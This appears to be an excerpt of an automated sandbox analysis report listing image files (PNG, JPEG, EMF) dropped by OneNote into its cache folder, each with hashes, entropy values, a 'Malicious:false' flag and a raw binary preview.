                                                                                                  Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):647
                                                                                                  Entropy (8bit):6.854433034679255
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                  MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                  SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                  SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                  SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52912
                                                                                                  Entropy (8bit):7.679147474806877
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                  MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                  SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                  SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                  SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27862
                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):977
                                                                                                  Entropy (8bit):7.231269197132181
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                  MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                  SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                  SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                  SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34299
                                                                                                  Entropy (8bit):7.247541176493898
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                  MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                  SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                  SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                  SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10056
                                                                                                  Entropy (8bit):7.956064700093514
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                  MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                  SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                  SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                  SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84097
                                                                                                  Entropy (8bit):7.78862495530604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                  MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                  SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                  SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                  SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64118
                                                                                                  Entropy (8bit):7.742974333356952
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                  MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                  SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                  SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                  SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65998
                                                                                                  Entropy (8bit):7.671031449942883
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                  MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                  SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                  SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                  SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A0.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A1.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A2.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A3.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
